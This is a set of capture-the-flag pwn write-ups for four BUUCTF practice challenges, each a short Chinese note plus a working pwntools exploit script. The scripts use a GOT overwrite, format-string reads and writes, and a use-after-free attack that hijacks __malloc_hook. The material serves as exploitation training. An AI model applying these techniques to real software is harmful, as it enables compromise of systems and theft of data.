PWN-PRACTICE-BUUCTF-28
- wustctf2020_name_your_dog
- judgement_mna_2016
- gyctf_2020_some_thing_interesting
- xman_2019_format
wustctf2020_name_your_dog
Partial RELRO,可修改got表
scanf_got距离Dogs56个字节
当index为-7时,即可改写scanf_got为shell的地址
from pwn import *
#io = process("./wustctf2020_name_your_dog")
io = remote("node4.buuoj.cn", 29103)

# Value written into the selected name slot; the notes above identify it as
# the binary's shell function (fixed address, Partial RELRO binary).
shell = 0x080485CB

# Two prompts, two answers: the index (-7, which per the notes above lands on
# scanf's GOT entry) and the 4-byte little-endian address that replaces it.
for prompt, answer in (
    ("Name for which?\n>", "-7"),
    ("Give your name plz: ", p32(shell)),
):
    io.sendlineafter(prompt, answer)

io.interactive()
judgement_mna_2016
格式化字符串漏洞,找到flag在栈上的偏移为28,"%28$s"即可打印出flag
from pwn import *
#io=process("./judgement_mna_2016")
io = remote("node4.buuoj.cn", 25668)

# Drain the banner up to the input prompt before sending anything.
io.recvuntil("Flag judgment system\nInput flag >> ")

# Kept for reference only: the address itself is never sent, the positional
# read below does the work.
flag_addr = 0x0804A0A0

# Positional format-string read of stack slot 28 (offset from the notes above).
payload = "%28$s"
io.sendline(payload)

io.interactive()
gyctf_2020_some_thing_interesting
格式化字符串+UAF,参考:[BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
# -*- coding:utf-8 -*-
from pwn import *
#io=process("./gyctf_2020_some_thing_interesting")
io = remote("node4.buuoj.cn", 25715)
elf = ELF("./gyctf_2020_some_thing_interesting")
libc = ELF("./libc-2.23-16-x64.so")


def check():
    """Select menu option 0 (the write-up marks this path as the format-string bug)."""
    io.sendlineafter("> Now please tell me what you want to do :", "0")
def add(O_len, O_content, RE_len, RE_content):
    """Select menu option 1 and answer its four prompts in order.

    Lengths are sent as decimal strings; the two contents are sent as given.
    """
    io.sendlineafter("> Now please tell me what you want to do :", "1")
    for prompt, answer in (
        ("> O's length : ", str(O_len)),
        ("> O : ", O_content),
        ("> RE's length : ", str(RE_len)),
        ("> RE : ", RE_content),
    ):
        io.sendlineafter(prompt, answer)
def edit(index, O_content, RE_content):
    """Select menu option 2 for Oreo *index* and supply new O and RE contents."""
    for prompt, answer in (
        ("> Now please tell me what you want to do :", "2"),
        ("> Oreo ID : ", str(index)),
        ("> O : ", O_content),
        ("> RE : ", RE_content),
    ):
        io.sendlineafter(prompt, answer)
def free(index):
    """Select menu option 3 for Oreo *index* (the write-up marks this as the UAF)."""
    for prompt, answer in (
        ("> Now please tell me what you want to do :", "3"),
        ("> Oreo ID : ", str(index)),
    ):
        io.sendlineafter(prompt, answer)
def show(index):
    """Select menu option 4 (show) for Oreo *index*."""
    for prompt, answer in (
        ("> Now please tell me what you want to do :", "4"),
        ("> Oreo ID : ", str(index)),
    ):
        io.sendlineafter(prompt, answer)
def exit():
    """Select menu option 5 (quit). Note: shadows the builtin ``exit``."""
    io.sendlineafter("> Now please tell me what you want to do :", "5")


# gdb.attach(io)  # debugger hook, left disabled
#pause()
# Marker echoed back by the program; its length (14) is where the leaked
# value starts in the echo line.
code="OreOOrereOOreO" #len_code=14
# %17$p appends the 17th positional argument to the echoed marker.
payload=code+"%17$p"
io.sendlineafter("> Input your code please:",payload)
check()
# The echo is "# Your Code is <code>0x<hex>"; read the hex up to the newline.
io.recvuntil("# Your Code is "+code+"0x")
# The leaked value minus 240 is used as __libc_start_main's address for this
# libc build (libc-2.23-16-x64.so); libc base then follows from the symbol table.
__libc_start_main=int(io.recvuntil("\n")[:-1],16)-240
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
print("libc_base=="+hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]
# Candidate one_gadget offsets for this libc; the fourth is the one used.
ones=[0x45216,0x4526a,0xf02a4,0xf1147]
onegadget=libc_base+ones[3]
#pause()
add(0x68,"aaaa",0x68,"bbbb")
# Free Oreo 1, then edit it while freed (the UAF noted above): O becomes 0 and
# RE becomes an address 0x23 below __malloc_hook.
free(1)
#pause()
edit(1,p64(0),p64(malloc_hook-0x23))
#pause()
# 0x13 filler bytes followed by the one_gadget address.
payload="d"*0x13+p64(onegadget)
add(0x68,"cccc",0x68,payload)
#pause()
# Begin one more allocation via menu option 1, then hand the session over.
io.sendlineafter("> Now please tell me what you want to do :","1")
io.sendlineafter("> O's length : ",str(0x10))
io.interactive()
xman_2019_format
堆上的格式化字符串漏洞,参考:BUU-xman_2019_format-WP
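# -*- coding:utf-8 -*-
# The pwntools import was commented out, so `remote` was undefined and the
# script raised NameError before doing anything; restore it.
from pwn import *
#context.log_level="debug"

# Address whose low 16 bits are written through the 18th positional argument;
# the write-up above identifies it as the binary's shell function.
shell=0x080485AB
io=remote("node4.buuoj.cn",29724)
#io=process("./xman_2019_format")

# Single byte stored through the 10th positional argument with %hhn.
addr=0x9c
# Print addr characters, then store the character count (one byte) via
# argument 10. The '|' separates this part from the next; presumably the
# program formats each part on its own (see the linked write-up).
payload="%"+str(addr)+"c%10$hhn"+"|"
# Print shell's low 16 bits worth of characters, then store that count
# (two bytes) via argument 18.
payload+="%"+str(shell&0xffff)+"c%18$hn"
io.sendline(payload)
io.sendline("cat flag")
io.interactive()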